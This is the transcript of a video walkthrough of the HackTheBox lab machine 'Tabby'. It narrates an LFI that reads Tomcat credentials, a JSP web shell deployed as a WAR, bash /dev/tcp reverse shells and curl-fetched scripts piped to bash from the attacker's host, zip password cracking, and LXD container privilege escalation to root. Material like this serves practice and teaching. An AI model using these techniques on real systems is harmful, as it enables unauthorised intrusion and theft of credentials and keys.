What's going on YouTube? This is Ipsec. I'm doing Tabby from HackTheBox, which was released as an easy machine, but due to the exploit chains, I think it may be more along the lines of a medium chain. That being said, all the exploits here are pretty straightforward. You start off with access to both Apache and Tomcat. The Apache doesn't have any authentication, Tomcat does. So poking around the Apache web server, you find a LFI vulnerability that you cannot turn into code execution, but you can use it to dump configuration files. So we dump the tomcat-users.xml file, which grants us manager access into Tomcat. That gives us the ability to drop a web shell to the server and get code execution that way. Once on the server, we have to do a little bit of magic involving cracking a zip file to get access to a user. That user is a member of the LXD Group, so we can upload a LXC container, then use that container to read files off the root file system. So with all that being said, let's just jump in. As always, we're going to start off with an Nmap, so -sc for default scripts, SV, enumerate versions, OA, output all formats, put in the Nmap directory, but before we do that, we have to create that directory. So put it in the directory, call it Tabby, then the IP address, which is 10.10.10.194. I am going to add the -v flag so it shows me open ports as it finds them, and I'm also going to run this with sudo. And we can see a few ports found right away. We have 8080, 80, and 22. So let's take a look at port 80 because that's just HTTP, and that's generally where I like starting. So go to 10.10.10.194, and we get a web page. It's Megahosting, dedicated servers starting from 99 USD, and this looks very similar to one of the boxes I've seen in HackTheBox Battlegrounds. I do see a copyright of 2016, so maybe I should be looking for some type of CVE or something, because this may be the last time the page has been modified. We can go over all these links. I'm just seeing if they take us anywhere else. I'm looking at the bottom left of my browser, and I don't see it changing. And nothing changing there. We have an email address and a phone number, but nothing too interesting. Again, clicking the link just brings us back to the home page. Click on home. Look through each of these links. I see, again, look at the bottom left, they're going nowhere. Infrastructure just goes down here. Free trial doesn't appear to go anywhere, just back home. Going over to this news link, we can see it says megahosting.htb/news.php. And I probably want to create this DNS host entry before doing it, because I know megahosting.htb is not going to resolve, which means I'm going to go somewhere and my DNS is going to get cached. So if I add this in my host entry, if we do sudo vi etc host and do 10.10.10.194, I actually have to, helps if I don't make a typo when I type it, 10.10.10.194, and the host name is megahosting.htb. If I try to go to this domain still, it's not going to exist, megahosting.htb. Because the DNS is cached. I can try clearing the cache, but I don't think this actually does it. These are things I know to clear. We can restart Firefox. It's probably cached in the OS or something that I need to run a command. But now if we go to megahosting.htb, let's see. Oh, it actually loaded that time. Maybe it's just a time thing. Maybe it takes a minute for DNS to, I guess, get old and pull a new record, or maybe closing and opening Firefox did it or something. But now when we click on this news, we see we apologize to our customers for the previous data breach. We have changed the site to remove this tool and invested heavily in more secure servers. However, we can see it's using this parameter. I'm going to guess this is like statement.php or something. Statement.php. Let's see. Nothing. Maybe txt, HTML. But just thinking about how this parameter works, I'm guessing file is pulling some type of file. So I'm going to send this over to Burp Suite because I want to try path traversal to see if we can make it pull other files. So let's go over to Burp Suite, go to proxy. And again, the reason why I'm using Burp Suite to do this is because you can't really do path traversal in a web browser. If I turn this off and we try like dot dot slash a bunch of these etc pass wd to see what happens. Oh, it does. I'm used to web browsers and stuff taking off these dot dot slashes. I'm not sure why it didn't do that, but I always prefer exploiting in Burp Suite. But we can see definitely works with path traversal. Didn't actually expect that to work, but we could play with this more, maybe like index or maybe dot dot slash index.php, and looks like we get the PHP page. So if we just try index.php, what do we get? Nothing. So the statement is in some directory. We don't know where statement is, but it's definitely somewhere. We could probably figure this out by doing a PHP filter to grab the source code for this PHP page. Because if we look back at this, we should grab the news.php page, which will tell us exactly how this file parameter works. So let's grab that. In order to grab PHP, you will have to do PHP filters, and I wonder if we're actually going to be able to do it with this. We'll try. PHP : / filter convert base64 encode / resource equals. I think that's it. Maybe it's base64.encode. Let's try base64.encode. That one is for some reason so hard to memorize, but I can just Google PHP filter base64 encode, and we'll see what we did wrong. Convert.base64. So convert.base64 -in. Really? Convert.base64 yep. Okay. Let's just copy this. Because I probably made a typo somewhere. Resource equals. So I'm guessing we can't do this because we don't control the full path. So I'm guessing if we looked at the parameter, it's something like include path plus, what's the argument? File. So since we don't control this path piece before the file, we can't do this PHP filter. So that's probably why that's not working. Because it looks like we have this coded correctly, according to this. We could just try news.php, but yeah, it's not working. So I'm guessing what's getting put into file is like var www html, some folder name. So maybe like notes, and then that's what the parameter actually looks like, which is invalid code. But if we didn't have something before this, it would work. So can't do that. We can again grab files. So dot dot slashes etc pass wd, and we got that. The other thing I'd probably check is let's just do dot dot slash news.php. Wait, we didn't need to do that. That's funny. So this is a file get contents. So there's two things in PHP. There's file get content and there's like include. There's probably other ways to include files, but these are the two main ones. Include is going to execute everything within the PHP tag. So if the file had this, the include would execute this and we wouldn't be able to get the source code. So that's why I was trying to do the filter. Because it's probably doing the file get contents, it doesn't execute code, so we can just read files. So we can see exactly what the code is, and it's, as I expected, goes into a files directory and then gets that parameter. So it doesn't look like there's anything we can really do with this. And because we now know this won't execute code, even if we find PHP code, upload it, and put it there, I'm just going to switch and just look for things to extract out of this, because we know this is just a LFI with no possibility of code execution. So we can try etc passwd. Let's try a bunch of dot dot slashes. And we can see the users on this box. We got home ash. So let's see if I try to go home ash.ssh, home ash.ssh, authorized keys. Can we read this file? We can't. We shouldn't ever be able to read that file. It's just, again, something I check. Checking the history. Doesn't look like we can get anything out of that. I'm going to try like proc self environ. CMD line, it does work. So let's see. CD proc self here, see what files we have. Environ is what I wanted because this would get me the username of what I'm running. I'm guessing I'm Apache because CMD line Apache 2 K-start. So I'm probably the www data user or Apache. Probably not running as Ash. We can go back to the Nmap to see if anything exists. Let's just go to a new pane, go in Nmap, less Tabby Nmap, and oh, we had Tomcat running. So we had port 8080 we can look at. And this is a Ubuntu box. But we can take a look at port 80, or port 8080. So let's go to 10.10.10, 194, 8080, and we just get a default Tomcat page. We can try /admin. Doesn't exist. Manager. Sweet. So we can try like tomcat or admin tomcat. These are all just defaults of Tomcat. We can try manager tomcat. I think the sec list actually has a bunch of default passwords. So if you didn't know the default passwords of Tomcat, you just go to like op sec list find.grep tomcat. And it's under the passwords directory, default credentials, Tomcat, better default password list. So bunch of default passwords for Tomcat that we could try. However, we have a LFI to read files. So we can probably just use this LFI here to read the tomcat-users.xml file and get the password. So let's go to Google real quick. Location tomcat-users.xml Ubuntu. And let's see, where is it? I think it's in user share. So we can try this one first, etc tomcat 7. So let's try this. etc tomcat 7, tomcat users. Doesn't exist. Let's see, /user share. Let's see, user share tomcat 7, then probably etc tomcat. User share tomcat etc, maybe tomcat 7. Let's see. Sometimes getting the path is always the hardest part of LFIs. So user share tomcat 7, then bin catalina.sh. So this isn't going to give us the file we want, but it's a predictable file that would help us identify if we're even in the right directory. Let's see. User share tomcat 7 bin catalina.sh. Nope. The other thing we could be doing wrong is a wrong Tomcat version. So let's go take a look at our error message. It doesn't say anything. Let's just go to 8080. And we have Tomcat 9. So we're trying to do Tomcat 7 when the server is running Tomcat 9. So let's try changing this to Tomcat 9 catalina.sh. And there we go. We get the directory. So now we can try to figure out where the Tomcat users was. So was it etc tomcat-users.xml? Tomcat-user.xml? Was it just in etc? Let's try users. There we go. So we found the Tomcat users XML file. And here we have the credentials. we have Tomcat, and the password is this. So I'm going to go back to my box. Let's just open a new pane, close this one to go to the tmux home, and creds tomcat, and we'll do, I think it was manager. Let's see, what was the credential? Nope, user was tomcat. Yeah, there we go. I normally do like application user password, but application username is the same thing, may confuse me down the line. So that's why I just did that. Let's see, /manager, tomcat, password, access denied. What are we? User, role, we're admin. Admin GUI. Let's see. By default, manager is only accessible from a browser on the same machine. So let's check if AJP is installed. AJP is like a Tomcat proxy. I think that's on port 8006 or 8009. But if that is, it's going to allow us to proxy through the server and hit this admin page on localhost. So let's do nmap-p 8009 10.10.10 194. Run it with sudo, and it is closed. So let's see. We maybe will just hit the upload piece manually, and then do a put request. So text deploy. There we go. So this is the endpoint in Tomcat, which you can interact with via command line and just deploy applications. So Tomcat is just a way of running a bunch of Java applications. The Tomcat files are WAR files, W-A-R. So if we said deploy Tomcat app WAR file curl, it probably has a way, like curl -- upload file, manager deploy. So that's essentially what we're going to be doing. The first thing we need to do is create a WAR file to work with. We could either do MSF Venom or grab a web shell and do it through the web shell. I prefer doing it through the web shell, mainly just because MSF Venom generally does like optimized code that I don't fully understand, and I just think web shell code is easier to read. The web shell place I like going to is called TENNC, T-E-N-N-C, and we're just going to clone this into our opt directory. So cd opt, git clone, and I may even have this still. It doesn't look like I do. But now we can just go to web shell, and we have a bunch of web shells. So we can just do ls, I think JSP is one. Yeah. So inside of JSP, there's a lot of web shells we can choose from. Like, that's the one downside about this repo is it's not finding the web shell you want, it's deciding on the web shell you use. Let's see, what shell.jsp look like? That's a lot of code to use. So it's probably a good web shell, but not one I want to do first. I think cmd JSP.jsp is one I generally use. You can see I can read all the code without scrolling. So if something fails, it's probably going to be easy to find where it failed. And that's why I like this web shell. So I'm going to copy this file into HTB, Tabby, and we're just going to go there. And looking at this shell, note that Linux CMD and Windows CMD/C plus CMD. So we probably should go down to this exec and remove cmd.exe/c. Because that is, I guess, for Windows, and now this web shell should work. I'm going to change this form method to post, whoa, deleted way too much. Just because I really don't like doing GET requests. I'd rather do post because it gives me more freedom in the variables I used in my request, and it also doesn't send everything to the log file. The input name, I'm going to change from please CMD to please subscribe. And the main reason I do this is I never like doing a web shell and leaving all the defaults. Because if someone comes along and finds cmd.jsp.jsp, they can just look at the source, see its parameter name it uses, and take advantage of that web shell. So that's why I generally change that type of stuff. If you screw up, there's a chance that you just think your web shell doesn't work, which sucks. But I mean, that's the issue with security. Every now and then security breaks something and you end up troubleshooting things. I think that web shell is good. So we can do curl -t and then cmd JSP. I think that's all we need. We need username. I think in username curl is just -u. Let's go and cat credentials. And I'm probably going to send this to the proxy just so you can see it, what a request looks like. Let's see. I'm screwing all up real quick. Forgive me. I think this is how we do username. And then 10.10.10.194 manager text deploy. And what are the variables for deploy? Let's see. Curl -t manager text deploy. There we go. This looks like it's going to be good. Curl -t. See, that's undeploy. Undeploy is remove. So config user. Make this bigger for you. I think it's like endpoint or app. Let's see. It's just a config file. Oh, there we go. Path. Path is what we want. So we can do path. So text deploy path is equal to, we'll just say /app. And let's see. Actually, let's just Wireshark this. I probably need sudo Wireshark. Off the top of my head, I don't know exactly how to send curl through a proxy. It's probably -p, but this will work as well. Method not allowed. Manager text deploy. And we didn't see anything. What? Oh, it's probably on ton 1. There we go. So this is what the request looks like. If we follow TCP stream, you can see put, and then the path, authorization. This is going to be the credentials. Here's the file I'm trying to put, and it says method not allowed. So, oh, wait, I see. We're hitting Apache, not Tomcat. So let's go back up, and we can do port 8080. And deployed application at /app, but context failed to start. And this is because I'm not using a WAR file. Tomcat doesn't know how to handle just JSPs. It needs to be in a WAR file, which you can just do zip, cmd jsp.war, and then put the file name. I don't know exactly why it's so specific, but that's how Tomcat is. So let's change this to be a WAR file. App already exists, so we'll do, I guess, app2. And deployed application to /app2. Let's go over and check this out. So we can do Megahosting, change this to port 8080 /app2. cmd jsp.jsp. Sweet, we found it. If we do ls, we have files. So let's go intercept this again with Burp Suite to see if we can do this in a post request. So who am I? We have to change it to here. Burp. Who am I? Sent. And we are sending it in a post request. So that's what we wanted. We can run any command we want, but generally the command we like doing is a reverse shell. So --c --i dev tcp 10.10.14 My IP is not shown. .3 slash 9001 0 at and 1. That should be good. I'm going to run a script command and we'll say shell.out. And all that does is it's going to log everything to shell.oy, not out because I made a typo. But I always like doing these when I do reverse shells just so I know what commands I sent. We send this in and we actually did not get a shell. Bash-c, bash-i. Weird. Oh, probably URL encode. So let's highlight this, Control U, send, and we still did not get one. Let's see. I think that is right, but maybe we just can't do this type of reverse shell. So let's do Google and go to reverse shell cheat sheet to try a different shell. Shell cheat sheet. Pen test monkey. God, I hate when this happens. There we go. So bash-i. Looks like that's correct. I'm going to try something. Let's just try full path. IP ADDR 10.10.14.3. That's definitely it. Let's see. Is bin bash, is that where it is? Which bash? User bin bash. We can try that path. Still nothing. So I just don't think it likes this type of reverse shell, which is fine. We can try. We could put this in the JSP file probably and have that work. This is the other one I like trying. So I can go back here. I'm going to do which NC. We have NC on the box. We could probably NC-H to get a help. Maybe not. Let's put this to 10.10.14.3 port 9001. Control U. Run it. And we still don't get a shell. So what I'm going to do is see if we can even hit this port. There could be a firewall. So which curl? We have curl in the box. Curl 10.10.14.3 9001. We hit it. So maybe it's just this reverse shell or this command shell thing doesn't like us sending all these special characters in this. So what we can do is save a file to the disk. So I'm going to make dir dub. I'm going to do shell.sh bash-c bash-i. What is it? And like that, or like that, I think. Dev tcp 10.10.14.3 9001 0 at and 1. Okay. And we can do python 3-m http.server sudo listening on port 8000. So we can curl 8000/shell.sh and we get that file. We can output it to temp.sh. Yeah, temp.sh is fine. So we save that file to the disk, and now we can just try to execute it. Bash temp.sh. And do we still have a reverse shell? We don't. I'm going to exit, and then we're going to run the script command again because we have so much like just pollution in that log file. So lvnp 9001. And we got a shell. So this reverse shell payload, or not reverse shell, this cmd JSP.JSP just didn't like all the special characters. So that's why we wrote it to a file and then executed the file, because we got around special characters. The other thing we could try doing is if we didn't want to touch disk, we could potentially pipe that over to bash. And it doesn't work because, again, that special character. So there's probably a way around it. If you want, you can play with it. For me, I'm just going to do bash temp.sh to get the reverse shell. So we can do export term is equal to x term, so we can clear the screen. I thought we'd be able to clear the screen. There we go. And begin poking around at this box. The first thing I want to do is look for where my application's actually installed. I'm going to guess it's in this web apps directory. And the reason why I want to see where it's installed is just to see if there's other applications. We can see we got app2.war and app2. App.war, I think this is just the JSP file we had uploaded. So yeah, that's just the JSP file. So that's why Tomcat errors. It expects a WAR file, which is really just a zip, and then it unzips it. Since the very first time we did this exploit, we didn't give it a zip. It failed unzipping it, and that was the issue. We don't see any applications we don't expect here, so I'm going to guess that Tomcat we don't need to go to. I don't have a reverse a TTY. So I hit tab and it couldn't autocomplete. So I'm going to do python 3-c import pty pty.spawn, then bin bash. Okay. And then control Z, stty raw minus echo, hit FG, enter twice. And now we'll be able to do like tab autocomplete and things like that. Also, I can just hit control L to clear the screen instead of control L, then enter to send that key. But let's go to www.html to see if we missed anything in this directory. There is a readme.txt that looks like we missed, but there's nothing important there. There is the files directory. So this is where the statement was. Then we have revoke certs, archive, and this backup file. I'm just going to do find.-type f to see what's there in a file, and archive and revoke certs is empty, but this backup is not. So I'm going to do a du-hs on the backup file. 12k. Can we just base 64 that then? Let's see. Go up. Yeah, it's not big. And then copy this all to the clipboard and we'll put it back on our machine. There's a bunch of ways we could copy the file, but that's generally how I like doing it if it's a small file. So this will be backup.zip.b64, paste, base64-d, backup, now backup.zip, and then we can unzip the backup, and it wants a password. Password is password? Nope. Password 1? Nope. So we don't have the password. So do we have zip to John? We do. So we can do zip to John on backup.zip. Wait. What? Okay. Here it is. I don't know why it outputted a lot more. I expected just to get the hash, but okay. Let's see, pkzip2. I'm guessing this is what we want. Actually, it's probably this whole line. So what I'm thinking is this whole line, we got the file name, the hash, and then the files within the zip. I'm going to try outputting this to a file, and we can just call it hash.zip. And awesome. So all these we're not going to standard out. Maybe this is standard error message. So let's see, if we ran to dev null, we only get the hash. So yeah, I think this is standard error. But if we cat, what do we call it? Hash.zip, we get the thing we can pass over to John. So we can copy this, and then I'm going to go over to the Kraken, which is just a box in my basement that I use for cracking machines, or cracking hashes. And the reason why I always do it separately is because, number one, you shouldn't crack things in a VM, and number two, I don't like cracking things on my host operating system where I'm recording videos because I may drop frames. So I'm going to create the file Tabby, and we're going to put it here. And Hashcat, I don't think cracks zips, so we have to use John. So I'm going to opt, and then I have John installed and just John. I can do /John, home Tabby, and then -- word list is equal to opt word list rockyou.txt. And it says it has cracked as the password admin@IT. You can also do --show, and it'll go through John's like pot file and tell you the password. So we have it right here, but we can get out of the Kraken, and we'll try to unzip it. So I'm going to make dir temp, and I'm just going to move backup.zip inside of temp. And the reason why I'm moving it in this folder is because when you unzip things, sometimes they have a tendency of dropping files in the current working directory instead of creating a new one, which then just creates a whole mess. So let's do that. Put admin IT as the password. It was in my clipboard. And we have a few files, index.php, news.php. So let's go over to this. And let's see, do we have like a password in this? grep-i password dot. And I'm going to do -R to be recursive. DB pass username. And I'm going to make sure this is working with main. And I just said main because I read main there. So we know we'd grab something. We could potentially MD5 some every file. And we'll send this to pane 1. Let's see. We can just exit here. And MD5 sum the files here. Oh, we gotta go up a directory. MD5 sum everything here. And we can see README looks to be the same. Index. There's a difference of index. Let's see. base64-w0 index.php. Let's see, I think. Let's just not do w0. I'll put an echo afterwards, so it puts a blank line. There we go. So now we can grab index.php. And we'll see what the difference is. We just got to put this on the same box where index.php is. So index.php.2. Can we write a file? See, we can't. So let's go to cd temp. And the other thing I forgot was this was base64. So index.php.b64. That's not it. There we go. Base64-d index.php.b64 to index.php. And we can do a diff on the two files. So index.php, var dub HTML, index.php. What? MD5 sum. Did I just copy the wrong file? That's something I would do. Base64 index.php-w0 echo. Yeah, I probably copied the wrong file now that I'm looking at this. So copy that. And we can do vi. I'm just going to do i.b64. Paste. Base64-d i.b64. To index.php. Diff. And less-s maybe. Some things are different. Like it looks like the call us phone number is different. The email is different. So xspeedstudio@gmail versus sales@Megahosting. So it looks like they grabbed a bootstrap template from somewhere and just changed some information on the template, since those things change. So it's not like connecting to a database and doing something. I'm going to cat etsy passwd, and we do have that ash user. I'm going to try su-ash and admin at IT, I think was the password, and that is Ash's password. We could try it as root admin at IT, and doesn't look like we can. Sudo-l admin at IT. What? Run sudo ts at. That's weird. Ash may not run sudo on Tabby. I'm going to try SSHing Ash at 10.10.10.194. Accept the fingerprint. And we can't get in. Let's see. cd home.ssh. Make dir.ssh. Go in.ssh. ssh keygen-f IDRSA. And then we'll cat id rsa.pub to authorized keys. And I'm just making this so we can SSH into the box, because I like having an SSH shell more than a reverse shell. Number one, I mean, it stands out if we do psaef --forest, and we can see what a shell looks like. That looks bad. Also, like, the TTY and everything is just perfect. So that's why I like SSHing. V ID RSA, paste the key, chmod 600, ID RSA. We can get rid of this Wireshark. sh-i ash at 10.10.10.194. And we get in with SSH. So we can exit all this, reset here, exit, and the script is done. So if we wanted to, we can less shell.out, and we can see everything we did on the box. So if we ever forgot the password for Ash and we didn't write it down, we could just go back here, and it should show admin su-ash. So maybe the password actually did not show in this script. But yeah, maybe if we strings it out grep-i admin, yeah, maybe script won't go and grab that password prompt. Interesting. But we are on the password the box as Ash, so we can do a find dot to see what else there is here. We created that SSH key. We can look at bash history, nothing there. If we did lsla, we would see it's mounted to dev null, so we don't really have anything to go off of. So I'm going to go to dev shm and run linpeas. So cd dub copy opt privilege escalation script awesome suite linpeas.sh here, and curl 10.10.14.3 port 8000 linpeas.sh, pipe it over to bash, and then we just got to start a Python server, and it's going to run linpeas. So I will pause the video and we'll resume when this is done. It only takes a few minutes. So yeah, linpeas is finished. So I'm going to search back for 99%, because 99% doesn't really exist anywhere and generally gets me to the top of linpeas output. So that's why I like doing it. And I'm just going to search for where I see highlighted yellow, and right off the bat, I see user groups and LXD. So LXD is commonly associated with the privesc. I'm going to just press page down to see if we see any other ones that are just highlighted in yellow that stick out, but that's going to be the first thing I take a look at, because that's where it's highlighted. So we have it highlighted there. Let's see, super user, Ash is highlighted because that's our username, so that's nothing. ADM, that doesn't look like anything. So again, just looking for that highlighted yellow. And doesn't look like we have anything, but I'm going to go to Google and say LXC privesc hack tricks, and then go to this very top one. This book.hacktricks.xyz is just a really good reference point when you're looking to do things. So for this to work, we have to create a container, and then we upload the container, load it, and then that container can read files on the root disk. So this is going to be installing things on our box. So let's run all of this. We just copy that, and we can paste. So paste. Doesn't look like it did all that much. So the last command it ran was this wget. So apt, wait, I don't think it did the apt update and everything. What? Yeah, that did not do everything. So let's just copy these one at a time. So sudo apt update. The next one's going to be install. I don't think I have the squash fs tools, so that's what we're going to have to do. So install Looks like it is installing something. Then we have to do a go git to clone the repo. And then we go in. So I'm just going to pause the video, let this apt finish installing. And now that it's done installing, we can go and do this next one, which is a go git. Go into that directory, make cd. It's weird that we have to do cd command with no arguments. So we'll do cd after this finishes. Okay, run cd. I guess cd with no arguments goes to your home directory. Today I learned. Do that. We can go into this directory, then download this. Then we do this command and bad alpine release. That's not good. Let's see. Home distro builder, build Linux. Okay. I guess maybe this version is just too old. Search for that. And where do we download this? Images alpine.yaml. This is a master. That shouldn't be. That should be most up to date. Let's see. Got this error message. See, expected. See, run by a server. This looks like the simplest solution. Let's try adding that. So -o. Hey, it's doing something. So I think that's what we needed. That -o. And I think we have that lxd.tar.xz. I think that's the file we want. So let's see. Yep, that's what we want. So we want to send this file over to the target. So let's do move lxd.tar.xz and rootfs.squashfs to htb tabby dub. Then we can download them. So I'm just going to go in the temp directory. These files could be big, so that's why I'm doing it in temp and not in dev.shm. Let's do Python and wget 10.10.14.3/lxd.tar.xz. Port 8000. Then we need to do root.squashfs. File not found. Rootfs.squashfs. If I can type or talk, it would definitely help me. There we go. Rootfs.squashfs. So now we got both of those files. So we should be able to do the LXD import. And now we can do image list. I guess we should have done this image list before importing because it could have been a machine, but it doesn't look like there was. And then we run this next command. So what this is going to do is start up the container, or take this image, create it as a container called privesc, and set security privilege to true, which I believe gives it access over the host disk. And no storage pool found. Let's see. Let's do LXD list real quick to see if that exists now. It does not. So I think we have to create a storage pool. So again, let's search this error message. Let's see how to fix this. Solution, LXD init. Does this have us run? Nope. Let's try LXD init. No, sure. Yes. I guess just choose default options. So many options. Sure. Let's see, does this create? Now we can try this one init command. There we go. So now if we do LXC list, we have our container privesc, and that is security privilege true. So this one is going to add the host root of / to mount root in our container. And recursive is going to allow us to go through directories. Okay, so we have now added a new mount point to this container, and the mount point / mount / root points to a host disk of /. So we can start the container, and then we can execute. So LXC exec privesc, that's the name of the container, bin sh, and do ID, we are root in our container. If we do cd /, we can go to, what was it? Mount, root, and now we are root in our host operating system. So we can probably just go to root again, and there's root.txt. We can go .ssh, and there is an ID RSA key. So we can just copy this, and we'll save this on our disk as root and SSH in as root. So let's do v, let's do it on a new window, v root.key. We will paste chmod 600 root.key sh-i, and then root at 10.10.10.194, and we're in as root. So that is the box. Hope you guys enjoyed. Take care, and I will see you all next time.